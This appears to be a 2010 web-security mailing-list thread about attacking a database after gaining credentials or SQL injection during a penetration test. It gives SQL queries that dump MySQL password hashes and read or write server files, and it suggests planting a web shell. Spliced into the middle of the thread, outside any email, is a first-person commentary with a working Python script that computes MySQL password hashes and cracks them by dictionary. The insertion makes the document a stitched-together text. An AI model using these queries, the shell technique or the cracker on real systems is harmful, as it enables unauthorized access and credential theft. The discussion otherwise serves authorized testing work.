[WEB SECURITY] Database tools required

Will Vandevanter Will_Vandevanter at rapid7.com
Tue May 18 15:01:54 EDT 2010


There are a number of attack vectors you can use from here. One of my favorite privilege escalation techniques is adding a page to the server as a shell. Typically, your DB user will need the ability to create tables and write to the filesystem. This technique is great for pivoting into the DMZ, depending on what your goal(s) for the engagement are.

I would also look into gaining access to other accounts, as I often find extra/hidden functionality as a higher-level user. One way to do this is to query for tables with "pass" as a column name (e.g. in MySQL: SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'password';). Often this hidden/extra functionality is not tested with the same rigor as other parts of the application and, on occasion, even allows me to directly access the filesystem (e.g. via deployment scripts, etc.).

-Will

________________________________
From: Shlomi Narkolayev [shlominar at gmail.com]
Sent: Tuesday, May 18, 2010 4:08 AM
To: nArEn ÁĹ0ПΞ Ŵ0ĹŦஇ
Cc: websecurity at webappsec.org
Subject: Re: [WEB SECURITY] Database tools required

Run these:
SELECT user FROM mysql.user;
SELECT host, user, password FROM mysql.user;

Use "John the Ripper" for cracking the password hashes.

Listing databases: SELECT distinct(db) FROM mysql.db;

Load file from OS: SELECT load_file(0x63...);
SELECT ... INTO DUMPFILE...
....

Kind Regards,
Narkolayev Shlomi.

Visit my blog: http://Narkolayev-Shlomi.blogspot.com
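Shlomi's second query dumps the password column of mysql.user and points at John the Ripper for cracking it. The script below is an added example (mine, not code from this thread or from any of the posters) that shows what those hashes actually are, so you can recognise them and sanity-check a few guesses before handing the list to John: MySQL 4.1+ PASSWORD() stores '*' followed by SHA1(SHA1(password)) in upper-case hex, and pre-4.1 servers (or old_passwords=1) store the 16-hex-character OLD_PASSWORD() value. It classifies each row, flags accounts with an empty password field (no password at all), and runs a short dictionary against each hash. The accounts, hashes and wordlist are constructed in the file; the function names mysql_native_hash, mysql_old_hash, classify_hash, crack_hash and audit_mysql_user are my own.

```python
"""Classify and dictionary-test password hashes pulled from mysql.user."""
import hashlib
import re
from typing import Dict, Iterable, List, Optional, Tuple

# Hash formats seen in the `password` column of mysql.user. The sample column
# values further down are constructed here; nothing comes from a real server.
NATIVE_RE = re.compile(r"^\*[0-9A-F]{40}$")  # MySQL 4.1+ PASSWORD()
OLD_RE = re.compile(r"^[0-9a-f]{16}$")        # pre-4.1 / old_passwords=1 OLD_PASSWORD()


def mysql_native_hash(password: str) -> str:
    """MySQL 4.1+ PASSWORD(): '*' followed by SHA1(SHA1(password)) in upper-case hex."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def mysql_old_hash(password: str) -> str:
    """Pre-4.1 OLD_PASSWORD(): hash_password() from sql/password.c, two 31-bit words as hex."""
    mask = 0xFFFFFFFF
    nr, add, nr2 = 1345345333, 7, 0x12345671
    for ch in password.encode("utf-8"):
        if ch in (0x20, 0x09):  # the original skips spaces and tabs
            continue
        nr = (nr ^ ((((nr & 63) + add) * ch) + (nr << 8))) & mask
        nr2 = (nr2 + ((nr2 << 8) ^ nr)) & mask
        add += ch
    return "%08x%08x" % (nr & 0x7FFFFFFF, nr2 & 0x7FFFFFFF)


def classify_hash(pw_hash: str) -> str:
    """Return 'empty', 'native', 'old' or 'unknown' for one mysql.user password value."""
    if pw_hash == "":
        return "empty"  # the account logs in with no password at all
    if NATIVE_RE.match(pw_hash):
        return "native"
    if OLD_RE.match(pw_hash):
        return "old"
    return "unknown"


def crack_hash(pw_hash: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack on one hash: the plaintext, '' for no-password accounts, or None."""
    kind = classify_hash(pw_hash)
    if kind == "empty":
        return ""
    hasher = {"native": mysql_native_hash, "old": mysql_old_hash}.get(kind)
    if hasher is None:
        return None
    for candidate in wordlist:
        if hasher(candidate) == pw_hash:
            return candidate
    return None


def audit_mysql_user(rows: Iterable[Tuple[str, str, str]],
                     wordlist: Iterable[str]) -> Dict[str, Tuple[str, Optional[str]]]:
    """rows are (host, user, password) tuples, the shape of
    SELECT host, user, password FROM mysql.user; returns user@host -> (hash kind, plaintext)."""
    words = list(wordlist)  # a generator would be consumed by the first row
    return {f"{user}@{host}": (classify_hash(pw_hash), crack_hash(pw_hash, words))
            for host, user, pw_hash in rows}


# Constructed sample of what mysql.user might return. The hashes are produced here
# from known plaintexts; "dba" has a password outside the wordlist and stays uncracked.
SAMPLE_ROWS: List[Tuple[str, str, str]] = [
    ("localhost", "root", mysql_native_hash("mypass")),
    ("%", "app", mysql_native_hash("password")),
    ("localhost", "legacy", mysql_old_hash("mypass")),  # created with old_passwords=1
    ("localhost", "backup", ""),                         # no password set at all
    ("localhost", "dba", mysql_native_hash("c0rrect-horse-battery-staple")),
]
WORDLIST = ["123456", "password", "mypass", "admin", "letmein"]

if __name__ == "__main__":
    for account, (kind, plaintext) in audit_mysql_user(SAMPLE_ROWS, WORDLIST).items():
        status = "NO PASSWORD" if kind == "empty" else (plaintext or "not cracked")
        print(f"{account:20} {kind:8} {status}")
```

An empty password column is worth reporting on its own: that account needs no cracking, only a host that matches its host pattern. Anything John does not crack in a few minutes should still go into the report as a hash, since the double-SHA1 scheme is unsalted and fast, so offline cracking with a larger list stays feasible for the client's attacker as well.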


2010/5/18 nArEn ÁĹ0ПΞ Ŵ0ĹŦஇ <narentherival at gmail.com>
Hello,
Very nice and informative post :) Thanks for it.
During my work I came across the same scenario, but a more difficult one:

- the database is MySQL 4.1, so no information_schema thing
- the user is user@localhost, so no admin rights

The application is vulnerable to SQL injection.

In such a case, what do you think the next step should be? Any ideas?

Thanks

Have a nice day :)

On Wed, May 12, 2010 at 10:00 AM, Shlomi Narkolayev <shlominar at gmail.com> wrote:
Hello,

If it's a somewhat serious website/organization, I'm pretty sure you will not get direct access to the DB; in most organizations the DMZ firewall allows access only to the application/web server on port 80/443 and not to the DB server.
As I understand it, you got the database credentials through a penetration test of the application, so I suggest you use SQL injection to extract the database entries in the same way you found the credentials.
If you only have blind SQL injection, you can use automated tools that will help you extract the DB's entries: Sqlmap, Absinthe, Pangolin, BSQL Hacker and many others.
Try first to find out the database version: SELECT @@version;
If it's MySQL, find out table names using: SELECT table_schema, table_name FROM information_schema.tables;
If it's MS-SQL: SELECT name FROM master..sysobjects WHERE xtype = 'U';
Then just run: SELECT * FROM %Tables_Names%;

If this website is hosted on GoDaddy or something similar, you just need to get the DB server's IP; the best way is to get it from the connection string, but you can also try to find the IP using SQL injection on the application.

Kind Regards,
Narkolayev Shlomi.

Visit my blog: http://Narkolayev-Shlomi.blogspot.com



On Tue, May 11, 2010 at 10:38 PM, Will Vandevanter <Will_Vandevanter at rapid7.com> wrote:
Check out the following auxiliaries in metasploit:

admin/oracle/oracle_login
admin/oracle/oracle_sql
scanner/mssql/mssql_login
admin/mssql/mssql_sql
scanner/mysql/mysql_login
admin/mysql/mysql_sql
scanner/db2/db2_auth

-Will

________________________________
From: Jorge Correa [jacorream at gmail.com]
Sent: Tuesday, May 11, 2010 3:15 PM
To: Will Vandevanter
Cc: p0wnsauc3 at gmail.com; Parmendra Sharma; websecurity at webappsec.org

Subject: Re: [WEB SECURITY] Database tools required

Could you recommend us some of these Metasploit tools?


Thank you,
Jorge Correa



On Tue, May 11, 2010 at 13:36, Will Vandevanter <Will_Vandevanter at rapid7.com> wrote:
Also, check out Metasploit which has some great modules for connecting to specific DBs.

________________________________________
From: TAS [p0wnsauc3 at gmail.com]
Sent: Tuesday, May 11, 2010 1:59 PM
To: Parmendra Sharma; websecurity at webappsec.org
Subject: Re: [WEB SECURITY] Database tools required

Hi,

Though you are not very clear with your question, I assume, since you have got the DB credentials, you want to connect to the database at the backend directly. If that is so, every database has its client. Download and install the client and connect to the backend.

TAS!

Sent from BlackBerry® - Vodafone

________________________________
From: Parmendra Sharma <s.parmendra at gmail.com>
Date: Tue, 11 May 2010 11:07:20 +0530
To: <websecurity at webappsec.org>
Subject: [WEB SECURITY] Database tools required

Hi All,

While performing a VA / PT exercise on an application I got the database credentials. Kindly suggest any tool which connects me to the database through the application.

--
Thanks and Regards:

Parmendra Sharma
Computer Security Analyst

----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA

--
ܔܢܜܔNaReN(๏̯͡๏)
ιηƒσямαт!ση ~# αησтнєя ηαмє σƒ gσ∂ ~●•●•●๋•
